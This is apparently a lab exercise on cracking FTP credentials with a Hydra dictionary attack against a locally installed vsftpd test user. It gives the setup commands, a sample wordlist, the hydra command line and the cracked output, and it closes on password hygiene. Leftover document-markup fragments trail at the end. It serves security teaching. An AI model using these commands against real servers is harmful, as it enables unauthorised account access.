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Crack FTP Credentials using a Dictionary Attack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perform a dictionary attack on an FTP server using the Hydra tool and crack the username–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 combination.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Tools reuired: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  Kali Linux (or any Linux distribution with Hydra installed)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2.   Hydra (pre-installed in Kali Linux)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3.   FTP Server (e.g., vsftpd running locally or on a target machine)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4.   Wordlist file (e.g., rockyou.txt or custom dictionary of passwords)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1. FTP (File Transfer Protocol) is a standard protocol for file transfer over TCP.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2. If weak credentials are used, attackers can exploit FTP using brute force or dictionary attacks.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3. Hydra is a fast and flexible network logon cracker that supports numerous protocols,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including FTP.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4. A dictionary attack attempts to guess credentials by trying every word from a given wordlist.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Install and start an FTP service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apt-get install vsftpd -y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systemctl start vsftpd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Create a test user with a weak password for demonstration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adduser ftpuser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set password (e.g., password123)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1.Check hydra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hydra -h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Create password file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existing wordlist: /usr/share/wordlists/rockyou.txt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 create a custom file pass.txt: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Pass.txt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123456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ftp123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Run Hydra against ftp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hydra -l &lt;username&gt; -P &lt;wordlist&gt; ftp://&lt;target-ip&gt;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hydra -l ftpuser -P passlist.txt ftp://192.168.1.10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-l → specifies username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-P → specifies password list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ftp:// → protocol and target IP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[21][ftp] host: 192.168.1.10 login: ftpuser password: password123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Hydra should successfully crack the FTP credentials if the correct password exists in the dictionary.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result will show the valid username and password pair. This experiment demonstrates how weak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FTP passwords can be cracked using a dictionary attack with Hydra. It highlights the importance of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strong password policies and secure configurations in preventing credential-based attacks.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114300" distR="114300">
            <wp:extent cx="5029200" cy="134272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114300" distR="114300">
            <wp:extent cx="5029200" cy="312867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114300" distR="114300">
            <wp:extent cx="5029200" cy="10813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5029200" cy="1622453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7rweQ/CoWY9aUhYg+wX5HayOvQ==">CgMxLjA4AHIhMTRRTEJ5QnBMMHAwcUEyY0lrYXNiT1RQbXhJcXMzMVVP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